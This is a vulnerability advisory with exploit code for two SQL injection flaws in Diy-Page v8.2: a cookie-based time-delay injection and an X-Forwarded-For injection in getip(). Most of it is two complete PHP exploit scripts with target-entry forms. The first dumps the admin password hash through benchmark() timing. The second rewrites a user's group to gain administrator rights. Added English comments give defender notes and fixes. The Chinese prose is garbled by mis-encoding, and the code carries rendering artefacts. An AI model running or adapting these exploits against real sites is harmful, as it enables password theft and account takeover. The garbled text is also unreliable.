Diy-Page v8.2 SQLע©

[Diy-Page v8.2 SQLע© ȫ]
Ӱ汾v8.2
ܣ
DiY-Pageʼ20052ĩһȫ¸ԶŻϵͳʹɵؽ̳һ׼Żվ㡣վԴҳĽɣϵĽĹƣܲߣܹϲ...... 

һ©cookIEӳע
λã/mod/dpcms/js/buymanage.php 


 include_once PATH_PRE.''lang/''.LANGPAK.''/fore.php'';include_once PATH_PRE.''lang/''.LANGPAK.''/dpcms_fore.php'';echo $uid=$_COOKIE[''dp_uid''];$eid=intval($_GET[''eid'']);$dateformat= $d_mainset[''mod_setting''][''dpcms''][''dateformat''] ? $d_mainset[''mod_setting''][''dpcms''][''dateformat''] : ''Y-n-j H:i:s'';$islog=$db->result($db->query(''SELECT count(*) FROM ''.DP_DBPREFIX.''user_list WHERE uid=''.$uid.'' AND password="''.$_COOKIE[''dp_password''].''"'')); 
  

$_COOKIE[''dp_uid'']ûо˾ʹѯˣעûлԣֻӳע롣 

ڶ©:getipע
λã/inc/func.php

   if (getenv(''HTTP_CLIENT_IP'') and strcasecmp(getenv(''HTTP_CLIENT_IP''),''unknown'')) {  $onlineip=getenv(''HTTP_CLIENT_IP''); }elseif (getenv(''HTTP_X_FORWARDED_FOR'') and strcasecmp(getenv(''HTTP_X_FORWARDED_FOR''),''unknown'')) {  $onlineip=getenv(''HTTP_X_FORWARDED_FOR''); }elseif (getenv(''REMOTE_ADDR'') and strcasecmp(getenv(''REMOTE_ADDR''),''unknown'')) {  $onlineip=getenv(''REMOTE_ADDR''); }elseif (isset($_SERVER[''REMOTE_ADDR'']) and $_SERVER[''REMOTE_ADDR''] and strcasecmp($_SERVER[''REMOTE_ADDR''],''unknown'')) {  $onlineip=$_SERVER[''REMOTE_ADDR'']; } return preg_replace("/^([\d\.]+).*/","\\1",$onlineip);
  


 

ص㿴һ䣺preg_replace("/^([\d\.]+).*/","\\1",$onlineip);ߵͼǽIPַȥ滻+㿪ͷַ˷ǷIP1.1.1.1abcdef滻1.1.1.1ȱݣֻҪֿͷǾͲ滻© 

EXP
ӳע룺

 

<?php  

/**  

*Diy-Page v8.2 Delay SQL Injection Exploit  

*ڣ2011-2-2  

*ߣ  

*߲ͣ  

*©汾8.2  

*ٷַhttp://www.diypage.com  

**/ 

/*
 * Advisory PoC for finding 1 (/mod/dpcms/js/buymanage.php): the application
 * concatenates $_COOKIE['dp_uid'] into its user_list query unescaped, and this
 * script measures how long js.php?mod=dpcms&name=buymanage takes to answer a
 * crafted Cookie header. Kept exactly as the advisory prints it: the doubled
 * quotes ('') and `emptyempty` are rendering artefacts, the collapsed `//`
 * comments swallow the rest of their physical line, and `dIE` is as printed,
 * so this does not run as shown.
 *
 * Defender notes:
 *  - Indicator: a dp_uid cookie that is not a plain integer (here it carries
 *    `union select benchmark(`) together with repeated requests to that URL,
 *    each held open for roughly the benchmark() duration.
 *  - Fix in the application: intval() dp_uid before the query, keep
 *    dp_password out of SQL (compare the stored hash in PHP), and bind
 *    parameters instead of string-building the statement.
 */
session_start();  error_reporting(0);   if(isset($_GET[''host''])&&isset($_GET[''path''])){          $host = $_GET[''host''];          $path = $_GET[''path''];          $i = $_GET[''i'']; //ascλ          $j = $_GET[''j'']; //MD5λ                    //һִʱ          if(emptyempty($j)){                  $i = 0;                  $j = 1;                  nextcrack();          }          echo "ƽ{$j}λ...<br>ƽ:".$_SESSION[pass];          $timeout = 2; //ʱʱ          $password = pass();          $time1 = gettime();//һִʱ          send();          $time2 = gettime();//ڶִʱ          if($time2-$time1>$timeout && $j<33){                  //ƽɹ MD5λ+1                  //echo chr($password[$i]);exit;                  $_SESSION[pass].=chr($password[$i]);                  $i = 0;                  $j++;                  //sleep(1);//Ϣһᡣ                  nextcrack();          }elseif($j==33){                  echo "<br>ƽ";                  unset($_SESSION[pass]);                  session_destroy();                            }else{                  //ɶûƽ                  if($i>23) $i=-1;                  $i++;                  nextcrack();          }  }   //MD5ASC  function pass(){          //0-9 a-f A-F          $pass = ''48,49,50,51,52,53,54,55,56,57,65,66,67,68,69,70,97,98,99,100,101,102'';          $pass_arr = explode('','',$pass);          return $pass_arr;  }   //ȡǰʱ  function gettime(){          $mtime = explode('' '',microtime());          $starttime = $mtime[1]+$mtime[0];          return $starttime;  }    function send(){          global $host,$path,$i,$j,$password;          $cmd = "domain=www.zyday.com";      $data = "GET ".$path."/js.php?mod=dpcms&name=buymanage HTTP/1.1\r\n";      $data .= "Accept: */*\r\n";      $data .= "Accept-Language: zh-cn\r\n";      $data .= "Content-Type: application/x-www-form-urlencoded\r\n";      $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";      $data .= "Host: $host\r\n";      $data .= "Content-Length: 
".strlen($cmd)."\r\n";          $data .= "CookIE: dp_uid=1 union select benchmark(1800000,md5(1111)) from dp_user_list where uid=1 and ord(substring(password,".$j.",1))=".$password[$i]."--\r\n";      $data .= "Connection: Close\r\n\r\n";      $data .= $cmd;                    $fp = fsockopen($host, 80);                      //޷ӵ          if(!$fp){      echo ''[-]No response from''.$host;      dIE;          }       fputs($fp, $data);            $resp = '''';       while ($fp && !feof($fp))          $resp .= fread($fp, 1024);          fclose($fp);  }   //ƽһ  function nextcrack(){          global $host,$path,$i,$j;          echo ''<script>location.href="diysql.php?host=''.$host.''&path=''.$path.''&i=''.$i.''&j=''.$j.''"</script>'';  }   ?>  <html>  <title>diy-page v8.2ӳעEXP</title>  <b>diy-page v8.2ӳעEXP</b>  <form action="" method=''GET''>  <input type="hidden" name="i" value=''0''><input type="hidden" value=''1'' name=''j''>  Ŀַ<input type="text" name="host" value="*diypage''">www.sitedirsec.com">*diypageַhttp://<br>  Ŀ¼<input type="text" name="path" value="/">*ǶĿ¼򱣳Ĭ,ʽ/diypage/  <br><input type="submit" value="ʼ½" onclick="javascript:alert(''ڱվٶȱȽսкܴӰ죬ڱزEXPлл'')">  </form>  <br>  עEXPĳɹʵ״йء<a href=''/?p=63'' target=''_blank''>ӳעɹʣ</a> 

 

getip()EXP:


--------------------------------------------------------------------------------

 

<?php  

/**  

*Diy-Page v8.2 getip() remote SQL Injection Exploit  

*ڣ2011-2-2  

*ߣ  

*߲ͣ  

*©汾8.2  

*ٷַhttp://www.diypage.com  

**/ 

/*
 * Advisory PoC for finding 2 (getip() in /inc/func.php): the application takes
 * X-Forwarded-For as the client address and its preg_replace() leaves any value
 * that does not start with digits untouched, so the header text built below
 * ends up inside the UPDATE the login path runs (the payload rewrites gid).
 * Kept exactly as the advisory prints it: the doubled quotes ('') and
 * `emptyempty` are rendering artefacts, so this does not run as shown.
 *
 * Defender notes:
 *  - Indicator: an X-Forwarded-For (or Client-IP) header that does not parse
 *    as an IP address — here it contains quotes and SQL keywords — on requests
 *    to js.php?mod=dpuser&name=login.
 *  - Fix in the application: validate the header with
 *    filter_var($ip, FILTER_VALIDATE_IP), fall back to REMOTE_ADDR when it
 *    fails, and bind the value as a query parameter; never interpolate it.
 */
if (emptyempty($_POST[submit])) {            }else{          error_reporting(0);          ini_set(''max_execution_time'', 0);          $host = $_POST[host];          $path = $_POST[path];          $dpusername =  $_POST[dpusername];          $dpuserpassword =  $_POST[dpuserpassword];          $dpseccode = $_POST[dpseccode];          send();  }   function send()  {      global $host, $path,$dpusername,$dpuserpassword,$dpseccode;       $cmd = "dpusername={$dpusername}&dpuserpassword={$dpuserpassword}&dpseccode={$dpseccode}&issubmit=1";      $getinj=''zyday1.1.1.1",gid=2 where username = \''''.$dpusername.''\''#'';      $data = "POST ".$path."js.php?mod=dpuser&name=login HTTP/1.1\r\n";      $data .= "Accept: */*\r\n";      $data .= "Accept-Language: zh-cn\r\n";      $data .= "Content-Type: application/x-www-form-urlencoded\r\n";      $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";      $data .= "Host: $host\r\n";      $data .= "Content-Length: ".strlen($cmd)."\r\n";      $data .= "Connection: Close\r\n";      $data .= "X-Forwarded-For: $getinj\r\n\r\n";      $data .= $cmd;       $fp = fsockopen($host, 80);      fputs($fp, $data);       $resp = '''';       while ($fp && !feof($fp))          $resp .= fread($fp, 1024);           echo $resp;       }    ?>  <html>  <head>  <title>diypage v8.2 getip()ע</title>  </head>  <body>  <form action='''' method=''POST''>  Ŀַ<input type=''input'' name=''host'' value=''''>*http://<br>  Ŀ¼<input type=''input'' name=''path'' value=''/''>*ǶĿ¼뱣Ĭ<br>  û<input type=''input'' name=''dpusername'' value=''''>*diypageû<font color=''red''>СŲ</font><br>  룺<input type=''input'' name=''dpuserpassword'' value=''''><br>*õ  <input type=''submit'' name=''submit'' value=''Ȩ''><br>  </form>  ʾɹ½ʾȨɹȥԱ̨½ɡ<br>  <a href="" target="_blank">BY </a>  </body>  </html> 

 
